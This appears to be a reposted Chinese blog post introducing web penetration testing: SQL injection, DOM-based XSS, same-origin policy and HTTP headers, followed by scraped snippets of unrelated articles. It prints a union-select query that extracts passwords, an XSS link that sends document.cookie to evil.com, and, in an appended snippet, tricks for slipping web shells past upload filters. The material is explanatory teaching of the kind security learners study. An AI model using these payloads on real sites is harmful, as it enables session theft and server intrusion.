Web前端渗透测试技术小结(一)

首先端正一下态度不可干违法的事

1、SQL注入测试

对于存在SQL注入的网页,使用SQL语句进行关联查询(仿照C/S模式)eg   http://www.foo.com/user.php?id=1

常见的这样的网址,这样提交到服务器后返回的只能是ID=1的普通信息。做数据库关联查询http://www.foo.com/user.php?id=1 union where id=1 union select password ,1,a from users这样的SQL语句是合法的,如果拂去其端的应用存在SQL注入问题,他会认为这是合法的提交查询,当这样提交后user的password会发生泄漏。以及密码账户上也可以进行测试。

2、XSS跨站脚本攻击

这里先解释跨站脚本 eg <script>eval(location.hash.substr(1));</script>,这段代码会保存到http://www.foo.com/info/html中,JavaScript内置的函数eval可以动态的调用JavaScript语句,location.hash获取的是链接http://www.foo.com/info.html#callback中的#后面的内容,substr是字符创截取函数,location.hash.substr(1)表示截取#后面的内容给eval函数进行动态的执行。

现在来构造XSS链接脚本语句,http://www.foo.com/info.html#new%20Image().src="http://evil.com/steal.php?c="+escape(document.cookie)浏览器执行后脚本会变成eval(‘new Image().src="http://www/evil.com/steal.php?c="escape(document.cookie)‘)这样就可以跨站获取cookie信息,利用cookie可以登录被攻击者的账号,进行越权操作。

3、同源策略

不同客户端脚本在没有授权的情况下不能读写对方的资源。

所谓同域就是指 同协议,桐域名,桐端口,通常说的两个站点同域就是指他们同源。

客户端脚本主要是指JavaScript和ActionScript(Flash脚本语言),以及两者遵循的ECMAScript脚本标准,Flash提供了通信接口,两个脚本之间可以互相的通信。这里在说明一下Ajax是后台异步传输数据的一种形式,不需要刷新网页便可以修改后台数据。

所谓授权就是目标站明确返回HTTP响应头  Access-control-allow-origin: http://ww.evil.com那么ajax技术对www.foo.com上的数据进行读写操作。

读写权限,web上资源针对不同用户使用不同的权限,HTTP请求的referer只可读,但是document.cookie具备读写。

资源,这里只说跨护端的资源,包括HTTP消息头,整个DOM树,浏览器存储cookie 、Flash Cookie、localStorage。

4、HTTP协议

在抓包分析中常看到HTTP协议链接会立即断开或者延时断开,每次请求都是再次建立。

GET http://www.foo.com/ HTTP/1.1

Host: www.foo.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like
Gecko) Chrome/18.0.1025.3 Safari/535.19
Referer: http://www.baidu.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: SESSIONID=58AB420B1D8B800526ACCCAA83A827A3:FG=1

响应如下:
HTTP/1.1 200 OK
Date: Sun, 04 Mar 2012 22:48:31 GMT
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Set-Cookie: PTOKEN=; expires=Mon, 01 Jan 1970 00:00:00 GMT; path=/;
domain=.foo.com; HttpOnly
Set-Cookie: USERID=c7888882e039b32fd7b4d3; expires=Tue, 01 Jan 2030
00:00:00 GMT; path=/; domain=.foo.com
X-Powered-By: PHP/5.2.6
Content-Length: 3635
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=gbk
<html>

4、iframe标签是HTML中的一个重要的标签,是web安全中出频率最高,很多网站通过这个标签嵌入第三方的内容,比如广告页面。

5、隐私获取,通过JavaScript语句可以构造函数获取相应的值,document.getElementById(‘private_msg‘).innerHTML这表示获取标签对象内HTML数据内容,也可以借用DOM接受标签名做进一步查询,document.getElementByTagNmae(‘div)[2].innerHTML;使用函数 getElementsByTagName接受的就是标签名,返回一个数组。另外还可以通过这种 方法获取cookie值,document.cookie

时到用时方恨少。。。。。。。。。

原文地址:https://www.cnblogs.com/xinxianquan/p/8336725.html

时间: 2024-11-05 19:42:37

Web前端渗透测试技术小结(一)的相关文章

渗透测试技术之本地文件包含

概述 通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞.在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞.此外,在本文中提到有一些技术,在CTF大赛中也经常被利用. 什么是本地文件包含(LFI)漏洞? LFI允许攻击者通过浏览器包含一个服务器上的文件.当一个WEB应用程序在没有正确过滤输入数据的情况下,就有可能存在这个漏洞,该漏洞允许攻击者操纵输入数据.注入路径遍历字符.包含web服务器的其他

【渗透技术】渗透测试技术分析_TomCat

[渗透技术]渗透测试技术分析_TomCat 本文转自:i春秋论坛 渗透测试-中间人攻击(原理)说起“中间人攻击”我想大多数对渗透测试又了解的朋友都多少有所了解,因为我们用到的次数真是非常的多.它可以将受害者发往服务器端的流量劫持到攻击者的计算机中,隐私得不到保证. 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到今天还具有极大的扩展空间. 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的S

web前端各大技术都能实现什么功能

以下是孜然为你总结的web前端开发你必须要一项一项掌握的技术:Html.css.ajax.jquery.extjs.JavaScript,今天为你详细解读他们各自都实现哪些功能? 1AJAX AJAX全称为"Asynchronous Java and XML"(异步Java和XML),是指一种创建交互式网页应用的网页开发技术. 国内通常的读音为"阿贾克斯"和阿贾克斯足球队读音一样. 2jQuery jQuery是继prototype之后又一个优秀的Javascrīp

web前端页面性能优化小结

转自blueidear:http://bbs.blueidea.com/thread-2936073-1-1.html PS:结合了精英的思想和自己的一些小小的总结~ 影响用户访问的最大部分是前端的页面.网站的划分一般为二:前端和后台.我们可以理解成后台是用来实现网站的功能的,比如:实现用户注册,用户能够为文章发表评论等等.而前端呢?其实应该是属于功能的表现. 而我们建设网站的目的是什么呢?不就是为了让目标人群来访问吗?所以我们可以理解成前端才是真正和用户接触的. 除了后台需要在性能上做优化外,

WEB下渗透测试经验技巧(全)[转载]

Nuclear’Atk 整理的: 上传漏洞拿shell: 1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马,拿到shell.2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现.例:*.asp ,*.asp...3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用).4.gif文件头欺骗5.同名重复上传也很OK.: 入侵渗透中用到的命令,语法: set,systeminfo,ipconfig,ping,利用这些命令可以收

web前端开发必备技术

1.Vue.js是什么? Vue.js(读音 /vju?/, 类似于 view) 是一套构建用户界面的 渐进式框架.与其他重量级框架不同的是,Vue 采用自底向上增量开发的设计.Vue 的核心库只关注视图层,并且非常容易学习,非常容易与其它库或已有项目整合.另一方面,Vue 完全有能力驱动采用单文件组件和 Vue 生态系统支持的库开发的复杂单页应用. Vue.js 的目标是通过尽可能简单的 API 实现响应的数据绑定和组合的视图组件. 如果你是有经验的前端开发者,想知道 Vue.js 与其它库/

Web前端开发——JS技术大梳理

什么是JS JavaScript一种直译式脚本语言,是一种动态类型.弱类型.基于原型的语言,内置支持类型.它的解释器被称 为javascript引擎,为浏览器的一部分,广泛用于客户端的脚本语言.JavaScript 是一种具有面向对象能力的.解 释型的程序设计语言.更具体一点,它是基于对象和事件驱动并具有相对安全性的客户端脚本语言. 因为他不需要 在一个语言环境下运行,而只需要支持它的浏览器即可.它的主要目的是,验证发往服务器端的数据.增加 Web互 动.加强用户体验度等. 下面对js从整体的角

Web前端开发——CSS技术大梳理

前言 之前在看牛腩的时候对CSS进行了一下总结,那会儿刚接触,对CSS的理解还是不够系统和全面,现在看完CSS 了,再对CSS整体梳理一下. 整体概括 话不多说,先上图,对CSS进行一下整体了解. css是英文Cascading Style Sheets的缩写.中文翻译为层叠样式,是用于控制网页样式并允许将样式信息与网 页内容分离的一种标记性语言. 之前在做牛腩的时候已经把CSS的基本知识和用法进行了详细的讲解(CSS之浅入浅出,CSS之核心篇).这里就 不再累述.这里主要讲一下CSS与java

学习web前端开发基础技术需要掌握:HTML、CSS、JavaScript语言

1. HTML是网页内容的载体.内容就是网页制作者放在页面上想要让用户浏览的信息,可以包含文字.图片.视频等. 2. CSS样式是表现.就像网页的外衣.比如,标题字体.颜色变化,或为标题加入背景图片.边框等.所有这些用来改变内容外观的东西称之为表现. 3. JavaScript是用来实现网页上的特效效果.如:鼠标滑过弹出下拉菜单.或鼠标滑过表格的背景颜色改变.还有焦点新闻(新闻图片)的轮换.可以这么理解,有动画的,有交互的一般都是用JavaScript来实现的.